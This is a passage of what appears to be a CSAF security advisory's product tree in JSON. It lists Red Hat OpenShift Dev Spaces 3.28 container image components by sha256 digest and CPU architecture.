"product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64"
},
"product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64"
},
"product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x"
},
"product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64"
},
"product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64"
},
"product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64"
},
"product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x"
},
"product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64"
},
"product_reference": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x"
},
"product_reference": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64"
},
"product_reference": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64"
},
"product_reference": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64"
},
"product_reference": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x"
},
"product_reference": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64"
},
"product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64"
},
"product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x"
},
"product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64"
},
"product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64"
},
"product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x"
},
"product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64"
},
"product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64"
},
"product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
},
"product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64"
},
"product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x"
},
"product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64"
},
"product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
